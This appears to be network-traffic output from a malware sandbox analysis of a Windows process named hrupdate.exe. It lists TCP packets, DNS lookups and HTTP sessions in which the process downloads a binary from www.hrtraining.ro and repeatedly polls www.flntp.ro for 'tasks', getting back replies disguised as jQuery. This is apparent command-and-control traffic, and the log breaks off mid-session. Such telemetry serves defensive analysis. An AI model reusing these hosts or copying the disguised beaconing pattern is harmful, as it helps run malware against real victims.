                                                              Dec 19, 2024 22:41:35.111409903 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.111864090 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.112127066 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.112157106 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.114445925 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.114500046 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805635929 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805692911 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805768013 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.805768967 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.805833101 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805871964 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:35.805892944 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.805919886 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.840154886 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:35.840235949 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:36.213028908 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:36.213057041 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:36.213114977 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:36.240078926 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:36.240092993 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:37.633651972 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:37.633727074 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:37.634247065 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:37.634254932 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:37.636507988 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:37.636513948 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.367886066 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.367957115 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.367984056 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.367994070 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.368009090 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368051052 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368057013 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.368100882 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368123055 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.368168116 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368314981 CET49858443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.368323088 CET443498583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.783884048 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.783977985 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:38.784076929 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.784656048 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:38.784699917 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.233351946 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.233433962 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.233813047 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.233834982 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.235291004 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.235302925 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937350035 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937413931 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937571049 CET443498653.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:40.937642097 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.939407110 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.939408064 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:40.939408064 CET49865443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.054840088 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.054867029 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:41.055026054 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.055253983 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:41.055259943 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:42.446902037 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:42.446996927 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:42.447402954 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:42.447411060 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:42.449058056 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:42.449063063 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149411917 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149471045 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149503946 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149527073 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149529934 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149569035 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149669886 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.149714947 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149739027 CET49871443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.149758101 CET443498713.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.258745909 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.258838892 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:43.258922100 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.259099960 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:43.259138107 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:44.649626970 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:44.649713993 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:44.650085926 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:44.650100946 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:44.652142048 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:44.652159929 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374532938 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374593973 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374608040 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374624014 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374648094 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374677896 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374684095 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374732971 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374784946 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.374839067 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374944925 CET49877443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.374968052 CET443498773.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.492638111 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.492753029 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:45.492875099 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.493181944 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:45.493218899 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:46.891113043 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:46.891227007 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:46.891676903 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:46.891701937 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:46.894031048 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:46.894046068 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591612101 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591672897 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591769934 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.591840029 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591876984 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.591896057 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.591919899 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.592003107 CET49882443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.592032909 CET443498823.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.696486950 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.696535110 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:47.696635008 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.696822882 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:47.696842909 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.085484982 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.085551977 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.086324930 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.086338043 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.088814974 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.088819981 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.787978888 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788037062 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788064003 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788081884 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788103104 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788150072 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788155079 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788196087 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788201094 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.788247108 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788480043 CET49888443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.788492918 CET443498883.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.899035931 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.899079084 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:49.899166107 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.899488926 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:49.899502993 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.301052094 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.301111937 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.301573038 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.301584005 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.303981066 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.303987026 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994616985 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994679928 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994700909 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994714975 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994739056 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994782925 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994786978 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994824886 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.994843960 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:51.994895935 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.995062113 CET49894443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:51.995073080 CET443498943.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:52.101857901 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:52.101922989 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:52.102009058 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:52.102220058 CET49901443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:52.102251053 CET443499013.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:53.484822035 CET443499013.79.209.76192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 22:40:02.703282118 CET | 60729 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 22:40:03.265650988 CET | 53 | 60729 | 1.1.1.1 | 192.168.2.4
Dec 19, 2024 22:40:07.812637091 CET | 65379 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 22:40:07.951809883 CET | 53 | 65379 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 22:40:02.703282118 CET | 192.168.2.4 | 1.1.1.1 | 0xe696 | Standard query (0) | www.hrtraining.ro | A (IP address) | IN (0x0001) | false
Dec 19, 2024 22:40:07.812637091 CET | 192.168.2.4 | 1.1.1.1 | 0x3238 | Standard query (0) | www.hrtraining.ro | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 22:40:03.265650988 CET | 1.1.1.1 | 192.168.2.4 | 0xe696 | No error (0) | www.hrtraining.ro | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 22:40:03.265650988 CET | 1.1.1.1 | 192.168.2.4 | 0xe696 | No error (0) | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | 3.79.209.76 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 22:40:07.951809883 CET | 1.1.1.1 | 192.168.2.4 | 0x3238 | No error (0) | www.hrtraining.ro | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 22:40:07.951809883 CET | 1.1.1.1 | 192.168.2.4 | 0x3238 | No error (0) | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | | 3.79.209.76 | A (IP address) | IN (0x0001) | false

                                                              • www.flntp.ro
                                                              • www.hrtraining.ro

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 3.79.209.76 | 80 | 7428 | C:\Users\user\Desktop\hrupdate.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 22:40:03.390789986 CET | 57 | OUT | GET /trakingu/user HTTP/1.0
Host: www.hrtraining.ro
Dec 19, 2024 22:40:04.711673021 CET | 321 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:04 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 3.79.209.76 | 80 | 7428 | C:\Users\user\Desktop\hrupdate.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 22:40:05.320007086 CET | 62 | OUT | GET /trainingcheck_v5498 HTTP/1.0
Host: www.hrtraining.ro
Dec 19, 2024 22:40:06.615403891 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:06 GMT
Content-Type: application/octet-stream
Content-Length: 278025
Last-Modified: Mon, 04 Nov 2024 13:31:08 GMT
Connection: close
ETag: "6728cc9c-43e09"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:09 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:10 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:09 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5628
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:10 UTC | 5628 | IN |
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:11 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:12 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:12 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5713
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:12 UTC | 5713 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:14 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:14 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:14 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5692
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:14 UTC | 5692 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:16 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:16 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:16 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5671
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:16 UTC | 5671 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49736 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:18 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:19 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:18 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5713
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:19 UTC | 5713 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49737 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:20 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:21 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:21 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5607
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:21 UTC | 5607 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49739 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:22 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 21:40:23 UTC | 235 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Thu, 19 Dec 2024 21:40:23 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 5607
Connection: close
Cache-Control: max-age=0, no-cache
Pragma: no-cache
2024-12-19 21:40:23 UTC | 5607 | IN
Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 21:40:25 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: www.flntp.ro
Accept-Encoding: gzip, deflate
